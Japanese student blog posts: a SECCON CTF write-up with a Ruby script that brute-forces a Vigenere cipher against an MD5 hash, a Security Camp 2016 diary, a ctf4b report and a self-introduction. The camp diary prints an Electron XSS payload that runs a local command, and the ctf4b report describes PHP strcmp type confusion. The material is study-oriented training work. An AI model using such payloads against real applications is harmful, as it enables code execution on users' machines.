計算量はO(n^5)だけどn=28なのでまあ余裕だろうと

require 'digest/md5'

def enc s
    s.ord <= 90?(s.ord-"A".ord):(s=='{' ? 26:27)
end

def dec i
    i <= 25?((i+"A".ord).chr):(i==26?'{':'}')
end

def bfa s,i,key
    3.times { |e| key[(7+i)+12*e] = dec(s) }
    26.times { |e| bfa(e,i+1,key) } if i < 4
    key.size.times { |e| $plain[e] = dec($table[key[e].to_sym].index($cipher[e])) }
    if Digest::MD5.hexdigest($plain) == $plain_md5
        puts $plain
        exit
    end
end

$cipher = "LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ"
$plain = "SECCON{???????????????????????????????????}"
$key = "???????????????????????????????????????????"
$plain_md5 = "f528a6ab914c1ecf856a1d93103948fe"
# Vigenere table
$table = { "A":"ABCDEFGHIJKLMNOPQRSTUVWXYZ{}" }
28.times { |e| $table[dec(e+1).to_sym] = $table[dec(e).to_sym].split("").rotate.join  }

# KPA
7.times { |e| 4.times { |f| $key[e+12*f] = $table.select { |k,v| v[enc($plain[e])] == $cipher[e] }.keys.join } }

# 総当り
28.times { |e| bfa(e,0,$key) }


f:id:taiyoslime:20161211212129p:plain

ちょうどJOI2016-17予選前夜だったので競プロっぽく(?)楽しめた

FLAG:SECCON{ABABABCDEDEFGHIJJKLMNOPQRSTTUVWXYYZ}

#seccamp ’16 全国大会 参戦記

8/8 ~ 8/13までIPA経産省が主催する セキュリティ・キャンプ2016 全国大会 に参加してきた。

かなり勢いに任せて短時間で書いてしまったところがあり推敲とかしてないですが、某 顔を模した本の会社の偉い人がDone is better than perfect.なることを言っていた気がしたりしなかったりするので上げます。

DAY 0 - 8/8

前泊のため1日前から長野を出て特急あずさで新宿に向かった。寝てて気づかなかったけど到着が1時間ぐらい遅れたらしい。

ホテルのインターネット環境が基本有線なのと 講義でも使うということだったので、海浜幕張駅に着いてからバスで幕張イオンモールに移動して Thunderbolt to Ethernet アダプタを購入した。

この近辺バスが充実していて無料で駅からモールまで移動できた。


21:30過ぎくらいに会場に到着した。


ホテルはここに5日間泊めさせてもらってもいいのか…?というぐらい居心地がよく快適に過ごせた。ポットや空気清浄機もあり初日はそれらと戯れてた。お茶美味しかった。

これ正しくは Mbit/s です(目がついていなかった)

DAY 1 - 8/9

7:30ぐらいに起きて、前泊組の方たちと朝食をとったあとは部屋でゴロゴロしていた。



そろそろ参加者がちらほら到着しただろうという頃合いを計ってのそのそ部屋から出て下に降りると、既に多くの方が名刺交換を始めており一気に眼が覚めた。

昼食をとり、開講式があったところで初めての講義が始まった。

まず、共通講義としてセキュリティの基礎を学び、そのあと特別講義として最前線で活躍されている2名の方のお話を伺った

Cyber Defense Instituteの福森さんから「ZENIGATAになりたくて」

福森さん「Binaryできる人間はWebもだいたいできるけど、Web専門の人でBinaryできる人はなかなかいない」

精進せねば…..。

JC3の間仁田さんから「サイバー犯罪の実態とこれに対処するための取組」

セキュリティに対する具体的な警察の取り組みはあまり認知されていない気がして非常に面白かった。

コンビニツアー

キャンパーの外出は一日の終わりにコンビニにいくこと以外は許可されていなかった。

しんさくさんが「コンビニのレジにDDoSやめろ」と言っていたのが一番面白かった。

この日を最後にキャンプ終了まで外気に触れることはなかった。

DAY 2 - 8/10

この日から専門講義が始まった。

1-A HTTPプロキシ発展

Burp Suiteはブラウザやスマホ、サーバーからの通信を中継し解析・改変するLocalProxyツールの一つで、今回は主にこれを講義で使った。

まずは基本的なProxy,Repeater,Extender等のタブの使い方を学び事前課題のをおさらいをした後、Burp Extenderと呼ばれるBurpの拡張機能Javaで書いた。

選択肢としてはJythonJRubyでもできるのだが、今回はおとなしくJavaを書くことにしたが案の定とても辛かった。
Proxy画面でタブを一個増やし、base64で暗号化された通信を自動でデコードし、改変したリクエストを自動でエンコードして送るというプラグインを作った。

そして、これを用いてスマホアプリの通信をキャプチャしリクエストを自由に書き換えて脆弱性を突くという演習をする形になった。

今回はキャプチャする上で手元マシンのDNSとHostの設定をする方法をとったのだが、Mac機が私だけだったためfakeDNS.exeを動かすためにmfc42.dll入れてwineで動かしたり、なんかうまくいかないと思ったらMacのFirewallがオンになってたりで満身創痍だった。

Burpについての知見も深まり非常に楽しめた。

2-B 謎マシンでNetBSDのクロス開発体験

NetBSDは、ひとつのソースツリーで少なくとも58以上のアーキテクチャをサポートしているUNIX互換OS

Windows 10上のVMNetBSDを起動させ、そこでRasberryPI用のカーネルをクロスビルドした。

$ cd /usr/src
$ ./build.sh -j 6 -u -U -m evbarm -a earmv6hf tools
$ ./build.sh -j 6 -u -U -m evbarm -a earmv6hf kernel=RPI

結構時間かかるので気長に待ったあと、できたnetbsd.binをRPI用のメモリカードのの/boot/kernel.imgに書き込んでカーネルをアップデートする。(後に調べたところ、このあたりに詳しく乗っている:https://wiki.netbsd.org/ports/evbarm/raspberry_pi/

HDMIとUSBキーボード・マウス、LANケーブルをさしてRPIを起動して
勝手にメモリカードがのルートパーティションを自動調整するので待った(結構時間がかかった)ところ、NetBSDが無事起動した。

startxicewmを起動してそのあとmikutterを起動した。Rubyの通信のためにNetBSDのセキュリティ機構を切る必要があった。

mikutterや柚子胡椒ステッカーだったりを頂きました。

CTF

形式はJeopardyでもなくAttack & Defenseでもなく、一台のRPIへ接続して問題を解いていくという形式だった。
最初チームはひたすらブラウザ(80)のみを見ていたがnmapしたらあと4つぐらいポートが開いてて言葉にできない感情が沸いてきた。
それに時間かけた割にWebが1問も溶けなかったは痛かった。

確かチームは5位だったのだが経験不足が露呈する感じになってしまった。

DAY 3 - 8/11

3-A Webアプリケーションの脆弱性の評価と発見

前半では、脆弱性の発見のメソッドやTipsを学び 実際のサイボウズで使われていた製品の脆弱性を検証したりした(詳細は公開できませんが)

また、脆弱性評価システムのCVSS v3という手法を実際に手を動かしながら学んだ。(https://www.ipa.go.jp/security/vuln/CVSS.html)

これは幾つかの評価基準に基づき脆弱性の脅威を算出するという方法で
今回は基本評価基準 (Base Metrics)、現状評価基準 (Temporal Metrics)、環境評価基準 (Environmental Metrics)のうち、脆弱性を公表する組織がその脆弱性の深刻度を表すために評価する基準である基本評価基準を計算した(計算はめんどくさいので便利Webツールを使う)。

基本評価基準では幾つかの評価基準となる項目と、それぞれの項目に対応する選択肢が用意されている。

評価基準となる項目は

  • 攻撃元区分 ( ローカル / 隣接 / ネットワーク )
  • 攻撃の複雑さ ( 高 / 中 / 低 )
  • 攻撃前の認証可否 ( 複数 / 単一 / 不要 )
  • 機密性への影響 ( なし / 部分的 / 全体的 )
  • 完全性への影響 ( なし / 部分的 / 全体的 )
  • 可用性への影響 ( なし / 部分的 / 全体的 )

となり、これらの評価値を計算して指標とする。

複雑さ等、主観的な要素が入ってしまうのではないかと最初考えたが、組織内で明確な分類基準を作っておけば問題ないようだ。

実際にあった脆弱性に対して具体的に評価を行い、内容はここでは伝えることはできないが脆弱性評価において実践的な体験をすることができた。

4-C オンラインゲームアタック&ディフェンスチャレンジ

Capture the Frog!(カエルを捕まえろ!)という用意されたNode+Websocketで実装されたWebオンラインゲームの運営とプレイヤーに分かれてAttack & Defense形式の競技をした。

プレイヤー側は操作を自動化したり脆弱性を突いてアカウントを効率よく育て、運営側は脆弱性の修正や不正アカウントのBAN(但し時間での回数制限あり)を行う必要がある。

私は2回戦ともプレイヤー側として参加した。

あった脆弱性・バグとしては
実際の「盤上を1マスずつ動いて前後左右のカエルを捕まえレベルを上げていく」というルールに対して

  • levelupイベントをサーバーに直接emitすると無条件でレベルがあがる。
  • キャラクターの移動は前後1マスずつであるが、任意の位置に移動することができる
  • 捕まえるカエルの位置情報さえ判れば無条件に捕まえられる。

あと個人的に思ったことは

  • マップやキャラクターの情報を持つオブジェクト、その他関数全部がグローバルに展開されている。

ということがあった。

これらは1回戦で大方修正されたため

2回戦ではヘッドレスブラウザを使ってプレイヤーの動きをシュミレートし自動化するプログラムを書いていた。

が、運営側がこれを止めるため、一つの処理のたびに1秒程度間隔を取るような仕様になったため
自動化したスクリプトを動かしていたがあまり手作業と時間がかわらずじまいになった。

自分が運営だったらおんなじことをしそうなので何も言えない。

5-B USBメモリからブートしてみよう

配られたUSBの初期状態がMBR方式だったため、第1パーティションのPBRに自作プログラムを置き、MBRパーティションのフラグを改変(0x80だった気がする)したものを上書きした。

Macは諦めて、Windows10のセキュアブートを無効化しLegacy Boot Orderをオンにして先ほどのUSBをぶっ刺し無事OS抜きのHello Worldができた。

DAY 4 - 8/12

6-A 次世代プラットフォームのセキュリティモデル考察

前半はElectronアプリの脆弱性について。

Electronはメインプロセス=>node.js、レンダラプロセス=>Chromium + node.jsのため通常のWebアプリのセキュリティ対策に加えローカルアプリにおける注意も必要になってくる。

演習用のElectronアプリで脆弱性を探した。

通常のWebアプリにおけるDOM-based XSSと異なる部分は、Electronの場合Nodeの機能が使えてしまい(例えBrowserWindow生成時にwebPreferences: { nodeIntegration : false }としても、XSS<webview nodeintegration .... >を流しこんだり、window.openしてnodeIntegration=1を付与すれば終わり *1 )アプリを使っているユーザーの権限で任意のコードが実行できてしまう。

実際にinnerHTML

<img src=# onerror="require('child_process').exec('xcalc', ()=>{})">

みたいな感じのものを流し込んでで電卓を起動させることができた。

またWebviewに関するXSSだと広告等で任意コード実行される危険性もある。

その他に実習で使ったアプリではshell.openExternalを使った脆弱性もあった。

後半はWebとネイティブのつなぐ技術のお話

Webとネイティブアプリの欠点を補う手段として、JavaScriptとネイティブプログラムを相互につなぐ機構を導入して、Webに足りない機能はNative言語で実装してJSから呼び出す、という形のアプリが増えてきた。

例えば、Password Manegerのように、Webviewでフォームが登場したときにJSを注入しパスワード等を自動入力するような活用事例がある。

実際にパスワードマネージャーを模した攻撃対象のアプリが配られ脆弱性を探す作業をした。

アプリではiOS(Natibe)=>JSにevaluteJavaScript、JS=>iOS(Native)にWKScriptMessageHandler、を使用していた。

このようなアプリケーションに存在し得る主な脆弱性としてOrigin Validation Error、Frame Confusion、JavaScript Injectionがあるので、これらをうまく使った偽のサイトを構築しパスワードを入力させ奪取した。

7-B 組込みリアルタイムOSとIoTシステム演習

GR-PEACH上のTOPPERS/ASPカーネルリアルタイムOSのプログラミングをした。

内容あるのとかなり知見が得られたので後日Qiitaに別記事で投稿でもしようかなと思っています。

ひたすら仕様書やカーネルのコードを読んで挙動を予想・把握する経験をしたのは初めてだった。 かなり新鮮だった。

DAY 5 - 8/13

グループワーク(後述)の発表があった。

実機がLibreOfficeしか入っていなかったようでメンバーが作ってくれたPowerPointのプレゼンがうまく動かなかったのが心残りではある。

クロージングも終わり、最後にプレゼントとして3つ本を頂いた。

本当に5日間あっという間に終わってしまった。

グループワーク

  • 【未来】10年後のIT社会のセキュリティのあるべき姿
  • 【倫理】子どもたちに正しくIT技術を身に着けさせるために
  • 【対策】小規模企業におけるセキュリティ対策
  • 【回避】攻撃者に狙われないために何をすればいいか

のテーマでキャンプの期間でグループで議論を深めたり、チューターや講師の方にお話を伺ったりした成果を最終日に発表するという形だった。

私達は2つ目の【倫理】子どもたちに正しくIT技術を身に着けさせるためにを選択した。

少ない睡眠時間を削って資料を作ったり、講義の合間を縫ってヒアリングをしたりでかなり逼迫したスケジュールだった。

生活とか

  • 朝弱いくせに夜更かししてしまい一回寝坊をした。
  • 恐らく少数派であるご飯が足りない人間だったので、野菜をおかずにして白飯だけおかわりしていたところ色々な人に写真を撮られた。

頂いたもの

このような感じです。

感想

小学生の作文の感想みたいだが
「楽しかった」
本当にこれに尽きる。これ以上の言葉が見当たらない。

今後もどんどん忙しくなるとは思うが、CTF/セキュリティの勉強も少しずつ進めていきたいと強く思った。同年代で、同じ志をもつ方とつながりをもつことができたも非常に大きい。チューターの方という技術面だけでない憧れの存在もできた。

なんにせよ自分の行動体系が基本締め切り駆動なので、今後小さな目標を見つけどんどんこなして行ければと感じる所存。

このような機会を提供してくださったIPA総務省及び協賛企業の方々には本当に感謝してもし尽くせない思いです。本当にありがとうございました。

*1:最近は改善されたので、レンダラプロセスでnodeが再活性化されることはほぼないみたい

CTF for beginners 2016@長野に参加してきた

5/15(日)にctf4b@長野に参加してきた


長野県民としてこれほど嬉しい企画はない。 SECCONメルマガで「ctf4bを長野で開催する」という通知が届いてから5分で応募完了し、その日から非常にわくわくしていた私は当日意気揚々と長野市に向かった。

参加者の方は自分含めみんな長野の各地の山奥からのそのそ集結するんだろうなあと勝手に想像していたのだが、実際遠方からの参加者も多くいて驚いた。

講義はReversing,Web,Forensicsの3つを受けることができた。 思ったことをざっくりとまとめておく。

  • Reversing

    • apk解析
      いつも自分はDEXを取り出して、dex2jarをかけたあとそのままJD-GUIを使ってしまうのだが、今回はjarをさらにunzipかけてclassファイルをprocyonというデコンパイラで.javaを生成する仕方でやってみた。

    • elf解析
      今までgdbとobjdump使ってじっくり見てたけど、全く使った事なかったIDA使ってみて本当に感動した。実機にDemoバージョンを入れてみたので今後どんどん使っていきたい。

  • Web

    OSコマンドインジェクションだったり、PHPのis_numeric()の謎挙動、include()が生む脆弱性について等の講義だった。

    面白かったのは、PHPのType Confusionのお話
    PHPでは期待しない型の引数が与えられたときNULLを返す関数の仕様が多い。例えばstrcmpもそうなのだが、PHPでは NULL == 0 => tureなのである。strcmpは比較した結果が等しい時も0を返すため、これでパスワード等を比較していると脆弱性を生む原因になるみたいだ。

  • Forensics

    パケット解析をWireSharkで各ペインだったりフィルタだったりの使い方、TCP StreamとかProtocol Hierarchyの見方の説明を受けながら、実際に使ってみる感じだった。

    ファイル調査では、fileコマンドでは抽出できない入れ子ファイルの抽出はbinwalkでできるということを知った。

    個人的に一番楽しかった。


最後にミニコンテストのようなものを1時間ぐらいした。 誰がが旗取った時に「ピコーンピコーン!!」となるのが非常に新鮮だった。

結果は6位だった

f:id:taiyoslime:20160611225718p:plain

上から順番に解こうとしたため、難しい問題で時間を溶かした挙句最後に位置していたバイナリ問まで辿り着くのにかなり時間がかかってしまった。
数カ月前のJOI本選の教訓がまったく活かせていない。

今までは極めて牧歌的に、バイナリ眺めて全挙動を把握しきってから問題にとりかかるーーーということをしていたのだが
実際限られた時間の中で旗取るのにそんなことをしているのは明らかに無駄、いう極めて当たり前のことに気づけていなかった。

本当はWriteupなるものを書いてみたかったのだが、自分の作業の痕跡があまりにぐちゃぐちゃすぎたのでやめた。

これから少しづつOnline CTF等に参加しつつ実践経験を積んでいきたい。

自己紹介のようなもの

今までくだらない短文はTwitter、長めのものはFacebook、技術系の記事はQiitaとかに投稿していた。

比較的それらに投稿するまでもない長文とかを書く思考のゴミ箱が欲しかったのと、あとは、周りがやっていてなんとなく面白そうだったという単純な衝動から始めてみました。

AzureにWordPress鯖が塩漬けされてた気がしたんだけど、ブログのためだけに使うのも癪だったのではてブにしてみた。CSSもかなりカスタマイズできるみたいだし。

技術系の話とその他思ったこととかを半々くらいに投稿していければなあと。

 

自己紹介

はてブの通知が盛んに「まずは自己紹介しろ」みたいことを言ってくるので自己主張をします。

 

taiyoslime (すらいむ!)という名前でやっています 

Web、特にフロントエンド周りの技術と、競技プログラミングが好き。15'-16'情報オリンピックには一応出てた。
フロントエンド周辺はとりあえず荒れてて次から次へと技術が生まれ、死んでを永遠に繰り返してるので正直つらい部分はある。たまにフロント関連のOSSにPR送って貢献したつもりになったりしてる。
今はCTF・セキュリティ、PythonHaskell機械学習あたりを勉強中。
好きな言語はAPLでエディタはAtom+Vimキーバインド

 

デザイン系好きで(得意とは言っていない)、フォトショイラレぐらいは一通りは弄れるかも知れない。あとは、3DCGだったり、アニメーション・動画制作だったり割りと好き。学生の特権を活かしてMayaで遊んでる。Motion Graphicsという映像手法と、あとはHaskellでライブコーディングしながらVJするおじさんに感化されProccesing等でGenerative art的な何かを最近なんだかんだやってる気がする。

 

ピアノを14年くらい弾いてる。ヴィオラとドラムもやったりしてた。EDM系の音楽が好きで、特にプログレとトランスばっかり最近は聞いてる気がする。リビングのスピーカーでブレイクコアを大音量で流すと家族から苦情が来る。DTMしたいけどここ4,5年言ってる気がするけどDAWと音源その他を買うお金がない。つらい。
最近は人生の大半の時間を音ゲーに費やしているので焦燥感に駆られる。あと数年したら音ゲーのし過ぎで音ゲーになっているかもしれない。Groove Coasterは神ゲーなので全員やりましょう。

 
しばらくは過去ネタをちょろちょろと投稿して気が向いたらCSSいじくり回してデザインも変えたい

 

放置しないように頑張ります